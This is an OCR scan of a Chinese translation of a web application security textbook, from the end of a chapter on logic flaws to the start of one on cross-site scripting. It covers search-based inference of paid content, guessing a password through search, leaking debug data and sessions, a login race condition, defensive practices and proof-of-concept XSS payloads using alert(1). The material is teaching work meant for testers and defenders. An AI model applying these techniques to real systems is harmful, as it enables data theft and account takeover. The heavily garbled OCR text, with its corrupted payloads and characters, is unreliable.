认 步 又。 例如 ， 如 果 应 用 程序 执行 URL 编 码 ， 然 后 过 滤 掉 恶意 数据 
(如 <script> 标 签 ) ， 则 可 以 通过 提交 以 下 字符 串 来 避 开 确认 机 制 : 


$<script>3cscript%<script>3ealert (1) %<script>3c/ 
script%<script>3e 


T ER 跨 站 点 脚本 过 滤 经 常会 错误 地 删除 HTML 标 签 对 之 间 
的 所 有 数据 ， 如 <tag1>aaaaa</tag1>。 这 种 行为 通常 易于 受到 上 述 攻 
击 o 


11.2.10 i110: 滥用 搜索 功能 


我 们 曾 在 一 个 提供 基于 预订 的 金融 新 闻 和 信息 访问 的 应 用 程序 中 
发 现 过 这 种 逻辑 缺陷 。 随 后 ， 我 们 又 在 两 个 完全 无 关 的 应 用 程序 中 通 
到 相同 paid 这 表明 许多 逻辑 缺陷 既 难 以 捉摸 ， 又 广泛 存在 。 

1. 功能 

应 用 程序 允许 用 户 访问 大 量 的 历史 档案 与 当前 信息 ， 包 括 公 司 报 
表 与 账目 、 新 闻 稿 、 市 场 分 析 等 。 大 部 分 信息 只 有 付费 用 户 才 可 查 
阅 。 


应 用 程序 提供 一 个 功能 强大 、 分 类 详细 的 搜索 功能 ， 所 有 用 户 都 
可 使 用 这 项 功能 。 如 果 匿 名 用 户 执 行 一 项 查询 ， 搜 索 功 能 将 返回 所 有 
与 查询 相 匹 配 的 文档 链接 。 然 而 ， 如 果 用 户 想 要 查看 查询 返回 的 受 保 
护 文档 的 实际 内 容 ， 就 需要 付费 订阅 。 应 用 程序 的 所 有 者 认 为 这 种 行 
为 是 一 种 有 用 的 营销 策略 。 

2. 假设 

应 用 程序 的 设计 者 认为 ， 如 果 用 户 不 付费 订阅 ， 就 无 法 使 用 搜索 
功能 提取 任何 有 用 的 信息 。 搜 索 结 果 返 回 的 文档 标题 往往 含义 模糊 ， 
例如 ,， “2010 年 度 报 告 >、“ 新 闻 稿 08-03-2011” 等 。 

3. 攻击 方法 

因为 搜索 功能 指出 与 某 一 查询 匹配 的 文档 数量 ， 效 猎 的 用 户 就 可 
以 提交 大 量 查 询 ， 并 通过 推断 利用 搜索 功能 提取 正常 情况 下 需要 付费 
才能 查阅 的 信息 。 例 如 ， 下 面 的 查询 可 从 一 个 受 保护 的 文档 中 提取 内 


js 


和 


wahi consulting 
>> 276 matches 
wahh consulting "Press Release 08-03-2011" merger 
matches 
wahh consulting "Press Release 08-03-2011" share issue 
0 matches 
wahh consulting *Press Release 08-03-2011" dividend 
>> 0 matches 
wahh consulting "Press Release 08-03-2911" takeover 
>> 1 match 
wann consulting "Press Release 08-03-2011" takeover haxors inc 
>> 0 matches 
wahh consulting "Press Release 08-03-2011" takeover uberleet ltd 
D matches 
wanh consulting *Press Release 08-03-2011" takeover script kiddy corp 
>> 0 matches 
wahnh consulting "Press Release 09-03-2011" takeover ngs 
>> 1 match 
wahh consulting “Press Release 08-03-2011" takeover ngs anncunced 
>> 0 matches 
wahh consulting "Press Release 08-03-2911" takeover nas cancelled 
>> 0 matches 
wahh consulting "Press Release 68-03-2011" takeover ngs completed 


"- 1 match 


里 然 用 户 不 能 查看 文档 的 具体 内 容 ， 但 通过 发 挥 充 分 的 想象 并 使 
用 有 针对 性 的 请 求 ， 他 束 能 够 相对 清楚 地 了 解 文档 的 内 容 。 


V 提示 在 某 些 情况 下 ， 能 够 以 这 种 方式 通过 搜索 功能 过 滤 
言 息 ， 对 应 用 程序 的 安全 非常 重要 :， 它 会 披露 大 量 与 管理 功能 、 密 
码 和 采用 的 技术 有 关 的 信息 。 


YV ”提示 事实 证 明 ， 使 用 这 种 技巧 可 对 内 部 文档 管理 软件 实 
施 有 效 攻 击 。 笔 者 曾 采 用 此 技巧 对 存储 在 维基 百科 中 的 配置 文件 内 
的 关键 密码 实施 过 蛮 力 攻击 。 由 于 维基 百科 会 运 回 提示 ， 说 明 搜 索 


字符 串 是 否 出 现在 页 面 的 任何 位 置 〈 而 不 是 匹配 整个 单词 ) ， 因 
此 ， 可 以 通过 搜索 以 下 内 容 ， 逐 个 字母 地 对 密码 实施 蛮 力 攻击 : 
Password=A 
Password=B 
Password=BA 


我 们 曾 在 一 家 金融 服务 公司 使 用 的 Web 应 用 程序 中 发 现 过 这 种 逻 
辑 缺 陷 。 

1. 功能 

该 应 用 程序 最 近 才 开发 出 来 ， 像 许多 新 软件 一 样 ， 其 中 包含 大 量 
与 功能 有 关 的 缺陷 。 每 隔 一 段 时 间 ， 应 用 程序 的 各 种 操作 就 会 意外 中 
包 


断 ， 并 回 用 户 返回 一 条 错误 消 轧 。 
为 方便 错误 调 碍 ， 开 发 者 决定 在 这 些 消 轧 中 提供 详尽 的 信息 ， 
A: 


口 用 户 的 吴 份 ; 
口 当前 会 话 的 令 牌 ; 


口 被 访问 的 URL; 

口 在 造成 错误 的 请 求 中 提交 的 所 有 参数 。 

提供 这 些 消息 对 服务 台 工 作 人 员 调 查 并 恢复 系统 故障 非常 有 用 ， 
而 且 有 助 于 消除 剩 下 的 功能 缺陷 。 

2. 假设 

尽管 安全 顾问 经 常 提出 警告 ， 称 这 种 详尽 的 调试 消息 可 能 会 被 攻 
击 者 小 用， 但 开发 者 仍然 认为 它们 不 会 造成 任何 安全 漏洞 。 通 过 检查 
浏览 器 处 理 的 请 求 与 响应 ， 用 户 就 有 可 能 获得 调试 消息 中 包含 的 所 有 
信息 。 但 是 ， 这 些 消息 中 并 未 包含 与 实际 故障 有 关 的 任何 细节 (如 栈 
跟踪 ) ， 因 此 无 法 帮助 攻击 者 向 应 用 程序 发 动 有 效 攻 击 。 

3. 攻击 方法 

尽管 开发 者 对 调试 消息 的 内 容 进行 了 合理 保护 ， 但 由 于 他 们 在 创 
建 调试 消息 时 犯 下 的 错误 ， 假 设 仍然 存在 缺陷 。 

当 错误 发 生 时 ， 应 用 程序 的 一 个 组 件 将 收集 所 有 必要 的 信息 ， 并 
将 其 保存 起 来 。 用 户 收 到 一 个 HTTP 重 定向 ， 它 指向 一 个 显示 这 些 被 保 
存 信息 的 URL。 问 题 在 于 ， 在 应 用 程序 保存 调试 信息 、 用 户 访问 错误 
消息 时 ， 并 没有 使 用 会 话 。 相 反 ， 调 试 信息 被 保存 在 一 个 静态 容器 
内 ， 并 且 错 误 消息 URL 总 显示 最 后 放 入 这 个 容器 的 信息 。 因 此 ， 开 发 
者 认为 ， 使 用 重 定向 的 用 户 只 会 看 到 与 错误 有 关 的 调试 信息 。 

实际 上 ， 在 这 种 情况 下 ， 如 果 两 个 错误 几乎 同时 发 生 ， 普 通用 户 
偶尔 会 看 到 与 另 一 名 用 户 造 成 的 错误 有 关 的 调试 信息 。 除 线程 安全 问 
题 外 〈 见 下 一 个 示例 ) ， 这 并 非 一 个 简单 的 竞 态 条 件 。 如 果 攻 击 者 知 
道 错误 机 制 的 工作 原理 ， 他 就 可 以 重复 访问 消息 URL， 并 记录 下 所 有 
不 同 的 错误 消息 。 只 需 短 短 几 个 小 时 ， 他 就 可 以 获得 大 量 应 用 程序 用 
户 的 敏感 数据 : 

口 一 组 可 用 在 密码 猜测 攻击 中 的 用 户 名 ; 

口 一 组 可 用 于 劫持 会 话 的 会 话 令 牌 ; 

口 一 组 用 户 提交 的 输入 ， 其 中 包含 密码 和 其 他 敏感 数据 。 

因此 ， 错 误 机 制 可 能 会 造成 严重 的 安全 威胁 。 由 于 管理 用 户 有 时 
会 收 到 这 类 内 容 详细 的 错误 消息 ， 监 控 错 误 消 息 的 攻击 者 就 可 以 迅速 
获得 足够 的 信息 ， 从 而 攻破 整个 应 用 程序 。 


渗透 测试 步骤 


(1) 为 探查 这 种 缺陷 ， 首 先 列 出 应 用 程序 中 可 能 出 现 的 反常 


事件 和 和 条件， 以 及 以 非常 规 方式 同 浏 咒 占 返回 有 用 的 用 户 信息 的 情 
况 ， 如 返回 调试 错误 消 妃 。 

(2) 同时 以 两 名 用 户 的 名 义 使 用 应 用 程序 ， 使 用 一 名 或 两 名 
用 户 系统 性 地 创造 每 一 个 条 件 ， 并 确定 另 一 名 用 户 十 否 受到 影响 。 


11.2.12 (12: 与 登录 机 制 竞 


0 
1. 功能 

应 用 程序 执行 采用 一 种 安全 、 多 阶段 的 登录 机 市， 要 求 用 户 提交 
几 个 不 同 的 证 书 才能 获得 访问 权限 。 

2. 假设 

验证 机 制 接受 了 大 量 设计 审查 与 渗透 测试 。 应 用 程序 的 所 有 者 确 
信 ， 攻 击 者 无 法 向 验证 机 制 发 动 有 效 攻 击 ， 从 而 获得 未 授权 访问 。 

3. 攻击 方法 

实际 上 ， 验 证 机 制 存 在 一 个 细小 的 缺陷 。 有 时 ， 顾 客 登 录 后 ， 他 
可 以 访问 另外 一 名 用 户 的 账户 ， 查 看 该 用 户 的 所 有 金融 信息 ， 甚 至 使 
用 其 他 用 户 的 账户 进行 支付 。 最 初 ， 应 用 程序 的 行为 完全 是 随机 性 
的 : 在 获得 未 授权 访 间 之前， 用户 并 没有 执行 任何 非法 操作 ， 再 次 登 
录 时 ， 反 和 常 现象 也 不 会 重复 出 现 。 

经 过 一 些 调查 ， 银 行 发 现 ， 如 果 两 个 不 同 的 用 户 在 同一 时 间 登 
录 ， 就 会 出 现 错误 。 而 且 ， 并 不 是 每 次 出 现 这 种 情况 都 会 发 生 错 误 
〈 仅 在 少数 情况 下 错误 才 会 发 生 ) 。 发 生 这 种 错误 的 根本 原因 在 于 ， 
应 用 程序 将 与 新 近 通 过 验证 的 用 户 有 关 的 标识 符 临 时 保存 在 一 个 静态 
( 非 会 话 ) 变量 中 。 改 写 这 个 值 不 久 后 ， 应 用 程序 再 读 取 这 个 变量 的 
值 。 如 果 在 这 个 过 程 中 有 另外 一 个 线程 (处理 另 一 个 登录 ) 写 入 到 变 
量 中 ， 早 先 登录 的 用 户 就 会 分 配 到 属于 随后 登录 的 用 户 的 会 话 。 

这 种 漏洞 源 于 与 前 面 错误 消息 示例 中 相同 的 错误 : 应 用 程序 使 用 
静态 存储 保存 应 根据 独立 线程 或 会 话 保存 的 信息 。 人 然而， 由 于 这 类 错 


误 不 会 反复 出 现 ， 当 前 示例 中 的 缺陷 更 难 发 现 ， 也 更 难 对 其 加 以 利 
用 。 


这 种 缺陷 叫做 “部 态 条 件 ”"， 因 为 其 中 的 漏洞 仪 在 某 些 特殊 情况 下 
才 会 出 现 ， 而 且 存 在 时 间 很 短 。 由 于 漏洞 仅 在 短 时 间 内 存在 ， 攻 击 者 
面临 着 一 次 “ 鞠 赛 *， 必 须 赶 在 应 用 程序 关闭 它 之 前 对 其 加 以 利用 。 如 
果 攻 击 者 钙 应 用 程序 的 本 地 用 户 ， 他 束 有 可 能 知道 莞 仿 条 件 出 现 的 具 
体 情 景 ， 并 在 有 效 的 时 间 内 利用 漏洞 。 如 有 果 攻 击 者 属于 远程 用 户 ， 要 
想 实施 攻击 束 比 较 困难 。 

如 宁远 程 攻击 者 了 解 到 这 种 调 洞 的 本 质 ， 那 么 他 束 可 以 通过 使 用 
一 段 脚 本 连续 进行 登录 ， 并 查看 被 访问 账户 的 详细 资料 ， 从 而 设计 出 
有 效 的 攻击 方法 。 但 是 ， 由 于 这 种 漏洞 可 被 利用 的 时 间 极 短 ， 攻 击 者 
可 能 需要 提交 数目 庞大 的 请 求 。 

鉴于 以 上 原因 ， 我 们 在 正 常 渗透 测试 过 程 中 没有 发 现 苋 态 条 件 也 
吕 不 足 为 怪 了 。 只 有 当 应 用 程序 的 用 户 数量 足够 庞大 、 可 导致 反 单 现 
象 (由 顾客 上 报 ) 发 生 时 ， 这 种 条 件 才 会 出 现 。 然 而 ， 如 有 果 对 验证 与 
会 话 管理 逻辑 进行 挛 格 的 代码 审查 ， 还 是 有 可 能 发 现 此 类 问题 。 


渗透 测试 步骤 


进行 远程 < 凌 盒 测试 ?查找 这 类 细微 的 线程 安全 问题 非常 麻烦 ， 
应 个 视 为 一 项 专门 任务 ， 只 有 极其 注重 安全 的 应 用 程序 才 需 要 进行 
这 种 测试 。 

(1) 针对 选择 的 关键 功能 进行 测试 ， 如 登录 机 制 、 密 码 修改 
功能 与 转账 过 程 。 

(2) 对 每 一 项 测试 的 功能 ， 确 定 某 位 用 户 在 执行 一 项 操作 时 
需要 提交 一 个 或 少数 几 个 请 求 。 同 时 ， 找 到 确定 操作 结果 的 最 简单 
方法 ， 例 如 ， 核 实用 户 登 录 后 是 否 能 够 查看 他 们 目 己 的 账户 信息 。 

(3) 使 用 几 台 高 规格 的 机 器 ， 从 不 同 的 网 络 位 置 访问 应 用 程 
序 ， 写 出 一 段 攻击 脚本 ,代表 几 名 不 同 的 用 户 反 复 执行 相同 的 操 
作 。 确 定 每 项 操作 是 否 达 到 预期 的 结 采 。 

(4) 为 接收 大 量 错误 警报 做 好 准备 。 根 据 为 应 用 程序 提供 文 
持 的 基础 架构 的 规模 ， 可 能 需要 对 安装 的 软件 进行 负载 测试 。 有 
时 ， 反 和 现象 可 能 与 安全 无 和 天 。 


11.3 Wa 


就 像 无 法 通过 明确 的 特征 确定 Web 应 用 程序 中 存在 的 逻辑 缺陷 一 
样 ， 同 样 也 没有 能 够 保护 应 用 程序 的 万 能 防御 措施 。 例 如 ， 虽 然 无 法 
找到 安全 的 方法 奉 代 危险 的 API， 但 是 ， 下 面 的 一 系列 最 佳 实践 可 显 
著 降低 在 应 用 程序 中 出 现 逻 辑 缺 陷 造 成 的 风险 。 

口 确保 将 应 用 程序 各 方面 的 设计 信息 清楚 、 详 细 地 记录 在 文档 
中 ， 以 方便 其 他 人 了 解 设计 者 做 出 的 每 个 假设 。 同 时 将 所 有 这 些 假设 
明确 记录 在 设计 文档 中 。 

O 要求 所 有 源 代码 提供 清楚 的 注释 ， 包 括 以 下 信息 : 

m 每 个 代码 组 件 的 用 途 和 预计 用 法 ; 

m 每 个 组 件 对 它 无 法 直接 控制 的 内 容 做 出 的 假设 ; 

@ 利用 组 件 的 所 有 客户 端 代码 引用 ， 清 楚 记 杂 它 的 效果 有 助 
于 阻止 在 线 注册 功能 中 的 逻辑 缺陷 。 QER: 这 里 的 “ 客 
户 闪 ?不 是 指 客户 端 一 服务 器 关系 中 的 用 户 ， 而 是 指 组 件 
主要 依赖 的 代码 。) 

口 在 以 安全 为 中 心 的 应 用 程序 设计 审核 中 ， 考 虑 在 设计 过 程 中 做 
出 的 每 一 个 假设 ， 并 想象 假设 被 违背 的 每 种 情况 。 尤 其 应 注意 任何 应 
用 程序 用 户 可 完全 控制 的 假定 条 件 。 

口 在 以 安全 为 中 心 的 代码 审查 中 ， 从 各 个 角度 考虑 以 下 两 个 因 
R: 应 用 程序 如 何 处 理 用 户 的 反常 行 为 和 输入 ; 不 同 代 码 组 件 与 应 用 
程序 功能 之 间 的 相互 依赖 和 互 操作 可 能 造成 的 不 利 影响 。 

我 们 可 从 本 章 摘 述 的 特殊 逻辑 缺陷 实例 中 汲取 以 下 教训 。 

口 始终 记 住 ， 用 户 可 以 控制 请 求 每 一 个 方面 的 内 容 (请 参阅 第 1 章 
了 解 相 关内 容 ) 。 他 们 可 以 按 任何 顺序 访问 多 阶段 功能 ， 他 们 可 以 提 
交 应 用 程序 并 未 要 求 的 参数 ;他 们 可 以 完全 省 略 某 些 参数 ， 而 不 仅仅 
征 自 改 参数 值 。 

口 根据 会 话 确定 用 户 的 身份 与 权限 (请 参阅 第 8 章 了 解 相 关内 
容 ) 。 不 要 根据 请 求 的 任何 其 他 特性 对 用 户 的 权限 做 出 任何 假设 。 

口 当 根据 用 户 提交 的 数据 或 者 用 户 执行 的 操作 更 新 会 话 数据 时 ， 
仔细 考虑 更 新 后 的 数据 可 能 会 给 应 用 程序 的 其 他 功能 造成 什么 影响 。 
注意 ， 这 些 数据 可 能 会 给 由 其 他 程序 员 或 其 他 开发 团队 编写 的 完全 无 
天 的 功能 造成 意 想 不 到 的 不 利 影响 。 


口 如 采 一 项 搜索 功能 可 用 于 查询 禁止 某 些 用 户 访问 的 敏感 数据 ， 
确保 那些 用 户 无 法 利用 该 项 功能 、 根 据 搜索 结果 推 师 出 有 用 的 信息。 
如 果 可 以 ， 根 据 不 同 的 用 户 权限 保留 儿 个 搜索 索引 (search index) ， 
或 者 使 用 当前 用 户 的 权限 进行 动态 信息 搜索 。 

口 如 果 一 项 功能 允许 用 户 从 审计 妃 中 中 删除 任何 记录 ， 在 使 用 该 
项 功能 时 应 特别 小 心 。 另 外 ， 在 大 量 使 用 审计 的 应 用 程序 与 双重 授权 
A 
Ee] 。 

口 如 有 果 应 用 程序 根据 数字 交易 限额 执行 检查 ， 在 处 理 用 户 输 入 
前 ， 必 须 对 所 有 数据 实施 严格 的 规范 化 与 数据 确认 。 如 果 没 有 考虑 到 
使 用 负数 的 情况 ， 应 立即 拒绝 包含 负数 的 请 求 。 

口 如 果 应 用 程序 根据 订购 商品 的 数量 决定 折扣 ， 必 须 保 证 在 实际 
应 用 折扣 前 确定 订单 。 

口 如 果 在 将 用 户 提 交 的 数据 提交 给 可 能 易于 受到 攻击 的 应 用 程序 
组 件 前 ， 对 其 进行 转 义 处 理 ， 一 定 要 记得 对 转 义 字符 本 身 进行 转 义 ， 
否则 整个 确认 机 制 可 能 会 遭 到 破坏 。 

口 始终 使 用 适当 的 存储 方法 保存 与 某 位 用 户 有 关 的 数据 (或 者 保 
存在 会 话 中 ， 或 者 保存 在 用 户 资 料 中 ) 。 


11.4 ”小 结 


当 攻 击 应 用 程序 的 逻辑 缺陷 时 ， 渗 透 测 试 员 既 要 进行 系统 性 地 探 
查 ， 也 要 从 不 同 的 角度 思考 问题 。 如 前 所 述 ， 渗 透 测试 员 应 该 始终 执 
行 各 种 关键 检 查 以 确定 应 用 程序 在 收 到 反常 输入 后 的 行为 。 这 类 反常 
输入 包括 从 请 求 中 删除 参数 、 使 用 强制 浏览 不 按 预定 顺序 访问 功能 ， 
以 及 回应 用 程序 的 不 同位 置 提交 参数 。 通 常 ， 应 用 程序 啊 应 这 些 操作 
ne ee 
不 民 后 : 

除了 这 些 基本 的 测试 外 ， 在 探查 逻辑 缺陷 时 面临 的 最 大 挑战 ， 是 
如 何 深入 了 解 开发 者 的 思维 方式 。 需 要 了 解 他 们 想 要 达到 什么 目的 、 
可 能 会 做 出 什么 假设 、 可 能 采用 哪些 捷径 、 将 会 犯 下 什么 错误 。 想 
一 下 ， 假 设 完 工 的 最 后 期 限 临 近 ， 但 还 主要 担心 功能 而 非 安 全 ， 试 图 
在 现 有 代码 中 增加 一 项 新 功能 ， 或 者 需要 使 用 其 他 人 编写 的 质量 不 佳 
的 API 。 在 那样 的 情况 下 ， 开 发 者 可 能 会 犯 什么 错误 ? 如 何 利 用 这 些 


HR? 


11.5 ”问题 


欲 知 问题 答案 ， 请 访问 http://mdsec.net/wahh ° 

(1) 何 为 强制 浏览 ? 可 以 通过 它 确定 哪些 漏洞 ? 

(2) 为 防止 不 同类 型 的 攻击 ， 应 用 程序 对 用 户 输 入 实施 各 种 全 局 
过 滤 。 为 防止 SQL 注 入 ， 它 将 出 现在 用 户 输 入 中 的 单 引 号 配对 。 为 防 
止 针 对 一 些 本 地 代码 组 件 的 缓冲 区 次 出 攻击 ， 它 将 超 长 的 数据 截 短 到 
适当 的 长 度 。 这 些 过 滤 有 什么 问题 ? 

(3) 可 以 采取 哪些 步骤 来 探查 某 登 录 功 能 中 是 否 存在 故障 开放 条 
件 ? 〈 列 出 想到 的 各 种 不 同 的 测试 。) 

(4) 某 银行 应 用 程序 采用 一 种 非常 安全 可 靠 的 多 阶段 登录 机 制 。 
在 第 一 个 阶段 ， 用 户 输 入 用 户 名 和 密码 。 在 第 二 个 阶段 ， 用 户 输 入 在 
物理 令 牌 上 显示 的 一 个 不 断 变化 的 值 ， 并 通过 一 个 隐藏 表单 字段 重新 
提交 前 面 输入 的 用 户 名 。 

可 以 立即 发 现 的 逻辑 缺陷 有 哪些 ? 

(5) 在 通过 提交 专门 设计 的 输入 探查 一 个 应 用 程序 中 是 否 存 在 常 
见 的 漏洞 时 ， 应 用 程序 频繁 返回 包含 调试 信息 的 详细 错误 消 妃 。 有 
时 ， 这 些 消息 与 其 他 用 户 造 成 的 错误 有 关 。 这 种 情况 后 ， 职 无 法 令 其 
再 次 发 生 。 这 表示 应 用 程序 存在 什么 逻辑 缺陷 ， 接 下 来 该 如 何 处 理 ? 


第 12 章 
攻击 其 他 用 户 


绝 大 多 数 针 对 Web 应 用 程序 的 攻击 主要 以 服务 器 端 应 用 程序 为 攻 
击 目标 。 当 然 ， 许 多 这 类 攻击 会 侵害 到 其 他 用 户 ， 例 如 ， 盗 窃 其 他 用 
户 数据 的 SQL 注入 攻击 。 但 是 ， 攻 击 者 所 使 用 的 基本 攻击 方法 是 以 无 
， 目 的 是 执行 未 授权 操作 并 非法 访 
问 数据 。 

本 章 摘 述 的 攻击 属于 另外 一 种 类 型 ， 因 为 攻击 者 的 主要 对 象 是 应 
用 程序 的 其 他 用 户 。 服 务 器 端 应 用 程序 仍然 存在 所 有 相关 漏洞 ， 然 
而 ， 攻 击 者 利用 应 用 程序 的 一 些 行为 执行 针对 其 他 终端 用 户 的 恶意 操 
作 。 这 些 操作 可 能 会 造成 一 些 与 前 面 分 析 过 的 攻击 相同 的 后 采 ， 如 会 
话 支持、 未 授权 操作 和 披露 个 人 信息 ;还 可 能 导致 其 他 恶果 ， 如 记录 
键 击 或 在 用 户 的 计算 机 上 执行 任意 命令 。 

近年 来 ， 软 件 安 全 其 他 领域 的 关注 焦点 已 逐渐 由 服务 需 端 攻击 转 
变 为 客户 端 攻 击 。 举 例 来 说 ，Microsoft 过 去 会 定期 宣布 其 服务 器 产品 
中 存在 的 严重 安全 漏洞 。 虽 然 他 们 也 披露 大 量 客 户 端 缺 了 史 ， 但 这 类 和 缺 
陷 很 少 受到 关注 ， 因 为 对 攻击 者 而 言 ， 服 务 句 是 一 个 更 具 吸 引力 的 目 
标 。 仪 仅 几 年 内 ， 这 种 情况 就 发 生 显著 改变 。 自 Microsoft 的 IIS 6 Web 
服务 器 首次 发 布 以 来 ， 人 们 已 经 在 Microsoft Internet Explorer} ta gy F 
发 现 了 大 量 漏洞 。 随 着 人 们 对 安全 威胁 意识 的 普 志 增强 ， 软 件 开发 者 
与 墨客 之 间 的 前 沿 战场 已 经 由 服务 器 转 同 客户 端 。 

虽然 Web 应 用 程序 安全 状况 尚未 发 生 上 述 巨大 的 转变 ， 但 也 出 现 
了 相同 的 趋势 。20 世 纪 90 年 代 末 ， 因 特 网 上 的 大 多 数 应 用 程序 中 充 不 
着 命令 注入 之 类 的 严重 缺陷 ， 任 何 攻击 者 只 要 具备 一 点 点 相关 知识 ， 
就 能 够 轻易 发 现 并 利用 这 些 弱 点 。 尽 管 许 多 这 种 类 型 的 漏洞 今天 依然 
存在 ， 但 数量 逐渐 减 小 并 且 变 得 更 加 难以 利用 。 然 而 ， 即 使 是 最 为 注 
重 安全 的 应 用 程序 ， 也 仍然 包含 许多 可 轻易 发 现 的 客户 端 缺 陷 。 此 
外 ， 应 用 程序 的 服务 器 端 以 有 限 、 可 控 的 方式 运行 ， 而 客户 端 可 使 用 
任意 数量 的 各 种 浏览 器 技术 (包括 各 种 版 本 ) ， 由 此 客户 端面 临 大 苑 
围 可 成 功 实 施 的 攻击 癌 量 。 


FEER, SHURA anit ATT Hig; WS, EMTA AKK 
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间谍 软件 、 钓 鱼 攻击 和 木马 等 名 词 成 为 许多 以 前 从 未 听 说 过 SQL 注入 
或 路 径 遍 历 的 新 闻 记 者 的 口头 禅 。 针 对 Web 应 用 程序 用 户 的 攻击 也 日 
益 成 为 有 利 可 图 的 犯罪 行为 。 如 果 一 家 因特网 银行 拥有 1000 万 个 用 
户 ， 并 且 不 需要 熟练 的 技能 ， 只 需要 通过 相对 简单 的 攻击 方法 就 可 以 
攻破 其 中 1% 的 用 户 ， 那 何必 还 要 费 神 去 入 侵 这 家 银行 呢 ? 

针对 其 他 应 用 程序 用 户 的 攻击 形式 各 异 ， 它 们 之 间 的 微妙 之 处 与 
细微 差别 常常 被 人 们 忽略。 通常 ， 与 主要 的 服务 器 端 攻 击 相 比 ， 人 们 
对 这 些 攻 击 也 知之 甚 少 ， 即 使 经 验 丰 富 的 渗透 测试 员 也 会 混 消 或 忽略 
各 种 不 同 的 漏洞 。 本 章 将 描述 各 种 常见 的 漏洞 ， 并 说 明 渗 透 测 试 员 在 
确认 并 利用 这 些 漏洞 时 所 需 采 取 的 实用 步骤 。 

本 章 主 要 介绍 跨 站 点 脚本 (XSS) 。 这 类 漏洞 导致 了 针对 其 他 用 
户 的 重量 级 攻击 。 从 某 种 程度 上 说 ，XSS 是 在 web 应 用 程序 中 发 现 的 
最 为 普遍 的 漏洞 ， 困 扰 着 现在 绝 大 多 数 的 应 用 程序 ， 包 括 因 特 网 上 一 
些 最 为 注重 安全 的 应 用 程序 ， 如 电子 银行 使 用 的 应 用 程序 。 在 下 一 章 
中 ， 我 们 将 介绍 各 种 针对 用 户 的 其 他 类 型 的 攻击 ， 其 中 的 一 些 攻击 与 
XSS 非 常 类 似 。 


QS BAMA “用 户 之 所 以 被 攻破 ， 是 因为 他 们 没有 安全 意 
识 。” 


从 某 种 程度 上 说 ， 这 种 观点 是 正确 的 ， 但是， 尽管 用 户 采 取 了 


安全 防御 ， 一 些 针对 应 用 程序 用 户 的 攻击 仍然 能 够 取得 成 功 。 保 存 
型 XSS 攻 击 能 够 攻破 最 具 安 全 意识 的 用 户 ， 而 无 须 与 用 户 进行 任何 
交互 。 在 第 13 章 ， 我 们 将 介绍 许多 其 他 方法 ， 可 在 用 户 不 知情 的 情 
况 下 攻破 具有 安全 意识 的 用 户 。 


最 初 ， 当 XSS 在 Web 应 用 程序 安全 社区 广 为 人 们 所 知 时 ， 一 些 专 
业 渗 透 测 试 人 员 倾 向 于 将 XSS 当 做 一 种 “次 要 ”漏洞 。 这 一 部 分 是 因为 
该 漏洞 在 Web 应 用 程序 中 极为 常见 ， 也 因为 与 服务 需 端 命令 注入 等 许 
多 漏洞 相 比 ，XSS 并 不 能 被 独立 黑客 直接 用 于 攻击 应 用 程序 。 随 着 时 
间 的 推移 ， 这 种 观点 已 发 生 改变 ， 如 今 ，XSS 已 被 人 们 视 为 Web 应 用 


程序 面临 的 最 主要 的 安全 威胁 。 随 着 对 客户 端 攻 击 的 研究 不 断 深入 ， 
和 人们 开始 讨论 各 种 其 他 复杂 性 与 利用 XSS 漏 洞 的 攻击 不 相 上 下 的 攻 
| 
| o 

通常 情况 下 ，XSS 是 一 类 主要 的 应 用 程序 安全 缺陷 ， 它 常常 与 其 
他 漏洞 一 起 造成 破坏 性 的 后 采 。 有 时 ，XSS 攻 击 也 可 能 转变 成 某 种 病 
毒 或 能 够 目 我 党 殖 的 蠕虫 ， 这 种 攻击 确实 非常 户 重 。 


© 错误 观点 “不 可 能 通过 XSS 控 制 一 个 Web 应 用 程序 。” 


我 们 曾 仅 使 用 XSS 攻 击 控制 大 量 的 应 用 程序 。 在 适当 的 情况 
下 ， 技 术 熟 练 的 攻击 者 利用 XSS 汤 洞 即 可 完全 攻破 一 个 应 用 程序 。 
下 面 将 说 明 攻 击 者 如 何 实施 攻击 。 


12.1 XSS 的 分 类 


XSS 漏 洞 表现 为 各 种 形式 ， 并 且 可 分 为 3 种 类 型 : 反射 型 、 保 存 型 
和 基于 DOM 的 XSS 漏 洞 。 虽 然 这 些 漏洞 具有 一 些 相 同 的 特点 ， 但 在 如 
何 确定 及 利用 这 些 漏洞 方面 ， 仍 然 存在 一 些 重 要 的 差异 。 下 面 我 们 将 
分 别 介 绍 每 一 类 XSS 漏 洞 。 


如 琳 一 个 应 用 程序 使 用 动态 页 面 同 用 户 显 示 错 误 消 息 ， 束 会 造成 
一 种 常见 的 XSS 汤 洞 。 通 常 ， 该 页 面 会 使 用 一 个 包含 消 忌 文 本 的 参 
数 ， 并 在 啊 应 中 将 这 个 文本 返回 给 用 户 。 对 于 开发 者 而 言 ， 使 用 这 种 
机 制 非常 方便 ， 因 为 它 允 许 他 们 从 应 用 程序 中 调用 一 个 定制 的 错误 页 
面 ， 而 不 需要 对 错误 页 面 中 的 消息 分 别 进行 硬 编 码 。 

例如 ， 下 面 的 URL 返 回 如 图 12-1 所 示 的 错 座 消 居 : 


/ Error - Windows Internet Explorer 


hers. 
Hacker's 
Handbook 
an error occurred 
J mrad was ay KA ~ 
图 12-1 一 条 动态 生成 的 错误 消息 
http: //mdsec.net/error/5/Error.ashx?message=Sorry%2cranterrortoccurred 


分 析 返 回 页 面 的 HTML 源 代码 后 ， 我 们 发 现 ， 应 用 程序 只 是 简单 
复制 URL 中 message 参 数 的 值 ， 并 将 这 个 值 插入 到 位 于 适当 位 置 的 错误 
页 面 模板 中 : 


<p>Sorry, an error occurred.</p> 


提取 用 户 提 区 的 输入 并 将 其 插入 到 服务 硕 啊 应 的 HIML 代 码 中 ， 
这 是 XSS 漏 洞 的 一 个 明显 等 征 : 如 采 应 用 程序 没有 实施 任何 过 滤 或 净 
化 措施 ， 那 么 它 很 容易 受到 攻击 。 让 我 们 来 看 看 如 何 实施 攻击 。 

下 面 的 URL 经 过 专门 设计 ， 它 用 一 段 生成 弹出 对 话 框 的 JavaScript 
HIS TCS a RIB A: 

http: //mdsec.net/error/5/Error.ashx?message=<script>alert (1)</seript> 

请 求 这 个 URL 将 会 生成 一 个 HTML 页面 ， 其 中 包含 以 下 替代 原始 
消息 的 脚本 : 

<p><script>alert(1);</script></p> 


HRE, WRAR MEAP bias Pos, HR ee h 


现 ， 如 图 12-2 所 示 。 
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图 12-2 一 次 概念 验证 XSS 攻 击 


进行 这 个 人 简单 的 测试 有 助 于 淤 清 两 个 重要 问题 ， 首 先 ，message 参 
